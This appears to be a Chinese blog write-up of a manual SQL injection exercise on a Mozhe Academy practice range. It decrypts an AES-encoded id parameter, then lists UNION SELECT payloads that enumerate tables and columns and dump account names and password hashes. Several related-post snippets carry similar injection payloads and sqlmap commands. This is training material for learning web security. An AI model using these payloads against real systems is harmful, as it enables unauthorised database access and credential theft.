记一次墨者学院靶场手工注入

最新推荐文章于 2024-12-05 20:49:31 发布
最新推荐文章于 2024-12-05 20:49:31 发布
阅读量330 收藏
点赞数 1
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lc0813/article/details/114081163
版权

环境信息:

环境是这样的,通过SQL注入方式,获取WEB业务系统的账号密码进行登录。

web业务数据做了AES加密,需要找到AES加密秘钥和偏移量才能进行解密。

环境地址:

http://219.XXX.XXX.228:49408/

测试过程:

访问页面如图:

尝试账号密码登录进行注入,均返回账号或密码错误,注入点不在账号密码处,只能找其他地方。

登录一栏下面有一则通知栏,点击进去,感觉值为AES加密:

http://219.XXX.XXX.228:49408/news/list.php?id=ZUlJOGMzSmVMMHQwZHhNN3diM056Zz09

历经千辛万苦终于找到一个文件找到了AES的加密算法:

解密ZUlJOGMzSmVMMHQwZHhNN3diM056Zz09,解密:结果为1_mozhe。

1 and 1=2_mozhe加密之后访问,页面报错,终于找到注入点了。

1 order by 4_mozhe,测试有4个字段(字符型需要加':1' order by 4 --+)

1 union select 1,database(),version(),4_mozhe 查看数据库名和版本信息

-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()_mozhe  获取表名

-1  union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='XXXXX'_mozhe  获取字段

-1  union select 1,group_concat(name,0x3a,password),3,4 from XXXX_mozhe  获取信息数据

得到账号密码,密码为MD5加密。

总结

加密不能从根本上解决SQL注入的问题。很久没进行手注了,都忘记语法了,正好复习一下。

 

 

 

 

 

 

 

墨者学院靶场练习
cndydmz的博客
12-06 1396
1.SQL注入漏洞测试(布尔盲注) 首先进入靶场, 然后点击上图通知,进入 然后打开sqlmap 输入sqlmap -u http://219.153.49.288:40866/new_list.php?id=1 --current -db 获取数据库名 得到数据库名为stormgroup 然后输入sqlmap -u http://219.153.49.228:45907/new_list.php...
墨者学院-在线靶场
weixin_42730900的博客
02-23 4277
浏览器信息伪造 更改user-agent:Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365 MicroMessenger/6.0 NetType/2G ## 来源页伪造
墨者靶场 简单SQL注入步骤
qq_45723914的博客
06-10 626
进入靶场
墨者学院靶场
muqiyihan的博客
06-13 121
背景介绍:某单位IT运维人员,在服务器上留了一个页面用来ping内部服务器连通情况。安全工程师"墨者"检查发现这一文件存在漏洞,要求运维人员立刻下线。| linux的管道符 管道是一种通信机制,通常用于进程间的通信。ls 意思是查看文件夹,试探能不能看到系统的文件 发现有三个文件 以其中一个以K开头 应该是我需要的东西。在我尝试其他命令时发现把CAT和K中间的空格去掉后数字变红了 尝试发送发现还是不行。到这里应该想到是把空格进行了过滤 下面就应该尝试替换空格。使用Linux命令 | 尝试查看。
墨者在线靶场
2302_80256359的博客
12-05 552
访问靶场后点击公告即可看见url中有ID参数。将得到的密码进行md5解密。将得到的密码进行md5解密。将得到的密码进行md5解密。将得到的密码进行md5解密。进入在线靶场的公告页面。该表中一共存在3个列。成功登录后获取Key。成功登录后获取Key。成功登录后获取Key。成功登录后获取Key。
墨者学院在线靶场--WEB安全--SQL注入
m0_59022585的博客
07-09 1747
测试注入禁用password,注入-1+%75nion+%73elect+1,%64atabase(),(%73elect+group_concat(%70%61%73%73%77%6f%72%64)+%66rom+%73%74%6f%72%6d%67%72%6f%75%70%5f%6d%65%6d%62%65%72),4回显得到三个MD5加密的密码
墨者学院SQL手工注入靶场漏洞详解
sone_yoonyul的博客
07-07 1567
墨者学院SQL手工注入靶场漏洞详解目录靶场地址步骤详解 目录 靶场地址 该靶场墨者学院安全工程师“墨者”所搭建,靶场环境为Nginx+PHP+MySQL,启动靶场只需1墨币(注册的时候会送十几个墨币并且不会重复消耗,只需要尽情练习即可),靶场地址: https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe 步骤详解 观察首页,是否有注入入口 表单处无法进行注入,这时可以发现滚动栏有个通知,点开之后发现这是一
墨者学院 SQL手工注入漏洞测试(MySQL数据库)
qq_48368964的博客
07-22 482
id=1 order by 5 回显异常,说明有四列字段。id=1 order by 1 回显正常。由于为root用户,所以可以高权限访问其他的数据库信息,可跨库查询信息,同一个服务器下的不同站点中的数据库均可查看。接下来进行信息收集,收集数据库的信息:操作系统,数据库名,数据库的用户,数据库的版本等。直接在可控变量后面随便输入值,看回显效果,回显不正常,可能存在SQL注入。观察url信息,为GET请求,存在可控变量,验证是否存在SQL注入。1 and 1=2 回显不正常,可能存在SQL注入
墨者学院靶场SQL手工注入漏洞测试(MySQL数据库)操作分析
YRYUNO_1的博客
02-20 268
墨者学院的SQL手工注入漏洞测试(MySQL数据库)题目进行破解。
墨者学院】SQL手动注入 靶场初体验
bianxia123456的博客
04-06 4981
step1: 判断注入 判断是否存在注入,这个靶场肯定存在注入,在参数id后面拼接一些其他变量即可。 step2: 猜解列名数量 order by 关键字日常使用的时候是按照某个列名去排序,即“order by 列名字段”。 order by 后面加上序号,即按照第几列排序,order by 1,按照第一列的字段进行排序。 order by 默认升序,降序关键字DESC,即order by 字段名 DESC; 所以使用order by关键字就能够知道整个表一共有多少个列。 ...
墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)
weixin_46694260的博客
03-27 4096
0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入。同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清楚原理和方法的话…还是可以看的,大家多多给我点赞吧,哈哈哈哈哈,还是那句话,菜鸟一个,大佬勿喷~ 0x01 过程 首先,还是老样子,我们先看一下题目 这里通过题目我们知道,这次SQL注入是字符型的SQL注入 那我们就进入靶场环境 可以看到和上次一样,有一个登录系统,登录框下面有一个维护新闻轮播框 我们点进去
墨者靶场(综合)
曹振国的博客
06-20 2287
初级 综合表单暴力破解实训(第1题)提示:直接使用BurpSuite抓包跑数字HTML前端代码分析(暗链)提示:打开页面:访问得到key值:SVN信息泄露漏洞分析(第1题)背景介绍提示:1.使用dirsearch扫描地址2.使用Navicat Premium打开备份文件3.访问地址得到key值WEB页面源代码查看提示:F12看的key值 表单暴力破解实训(第1题) 提示: 直接使用BurpSuite抓包跑数字 成功拿到key HTML前端代码分析(暗链) 提示: 打开页面: 查看源码发现有一
墨者学院MySQL--sql注入靶场
weixin_43803070的博客
07-08 1679
这几天做题的时候发现了一个靶场,先做了一个SQL注入,怎么说呢,这个靶场环境还可以,但是个人感觉最后的 key获取,有点脑洞,没有太大的实际意义背离了实际的初衷,不说了直接上wp: 首先找注入点: http://219.153.49.228:40084/new_list.php?id=1‘// id=1的时候返回正常,id=1’的时候返回错误,说明存在sql注入。 http://219.153...
渗透学习—靶场篇—墨者学院—SQL注入漏洞测试(参数加密)
qq_43696276的博客
10-25 2046
这一关,难点主要在于需要我们判断参数后的加解密类型,从而引导我们去目录遍历,拿到对应的源码!!!然后呢,还需要我们能够对php代码进行审计,从而找出其参数的加密过程。。其中还有一个坑在于末尾要加上_mozhe总体而言,感觉难度还是稍有的(于我个人而言)
墨者学院——X-Forwarded-For注入漏洞实战writeUp
weixin_43862283的博客
12-24 423
墨者学院篇 X-Forwarded-For注入漏洞实战 实训目标 1、掌握SQL注入的基本原理; 2、了解服务器获取客户端IP的方式; 3、了解SQL注入的工具使用; 解题方向 对登录表单的各参数进行测试,找到SQL注入点,对数据库内容进行读取,找到账号与密码。 解题思路 判断注入点 爆破数据库 爆破数据表 爆破数据库列 爆破字段 将用户名秘密输入登录框,得到key CMS的URL ht...
墨者学院(4个sql靶场攻略)
2201_75891821的博客
07-22 1947
墨者学院 4种sql注入漏洞的解答 简单易理解 不复杂
墨者学院;sql手工注入;access;在线靶场
xiaochenhang的博客
08-20 841
恭喜你 moke 成功登录用户管理后台,KEY: mozhee7cc35d6a83a8978b4a44f56f6d。6、枚举关键表名:正常则存在admin表;通常access数据库都有admin表;8、 枚举字段:正常则页面不报错;通常access表会存在以下三个字段;,因此看到位数以及字母组成形式的字符可以迅速判断可能是MD5编码。5、access数据库没有库名,都是表名;4、输入' 成功闭合报错,有注入漏洞;1、注册账号,启动环境;9、爆一下用户账户密码;2、 得到端口号和地址;这里枚举失败,翻车;
【网络安全】-暴力破解实战-pikachu/墨者靶场
weixin_65311462的博客
09-03 1100
双载荷暴力破解:目标:pikachu-master 基于表单的暴力破解。
墨者学院sql手工注入
最新发布
03-03
### 关于SQL手工注入的学习 #### SQL手工注入简介 SQL注入是一种常见的Web应用程序攻击方式,通过向查询参数输入恶意的SQL语句片段,从而改变原有SQL命令的行为。这种技术能够绕过身份验证机制、读取敏感数据甚至控制服务器。 #### 靶场环境介绍 墨者学院提供了一个专门用于练习SQL注入技巧的安全测试平台[^2]。此靶场基于Nginx+PHP+MySQL架构构建而成,并且访问成本低廉——仅需消耗一枚虚拟货币“墨币”,新用户注册时通常会被赠送足够的余额来进行多次尝试而不必担心额外开销。 #### 实践案例分析 对于想要深入了解如何实施SQL注入的人来说,在实际操作之前先观察目标网站是否存在潜在可利用之处非常重要。比如查看URL中的GET请求参数是否未经充分过滤就被直接拼接到后台执行的SQL指令里;又或者是POST表单提交的数据项有没有被妥善处理等情形都可能是突破口所在[^1]。 当确认存在风险点之后,则可以根据具体场景采取不同策略展开进一步探索: - **字符型字段**:如果发现某个文本框允许接收任意字符串作为输入值的话,那么就可以试着构造一些特殊模式串去试探内部逻辑反应情况。例如`' OR '1'='1`这样的表达式往往能帮助判断出是否有漏洞存在以及其大致位置范围[^3]。 - **联合查询(UNION SELECT)**:这是一种较为高级但也非常实用的方法之一。它可以让攻击者将自己的SELECT子句附加到原始查询后面并获取更多有用的信息。像下面这条语句就是用来枚举当前库内所有表格名称及其所属数据库名的一个例子: ```sql new_list.php?id=-1 UNION SELECT 1,GROUP_CONCAT(TABLE_NAME),DATABASE(),4 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() ``` 请注意上述做法仅供合法授权下的渗透测试培训用途,请勿非法入侵任何网络设施! #### 安全建议 为了防止遭受此类威胁影响业务正常运转,开发者应当遵循最佳编码实践指南,如采用预编译语句代替动态组装SQL文法结构;严格校验前端传来的一切外部可控变量合法性;定期审查源码质量排除隐患等等措施加强防护力度。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值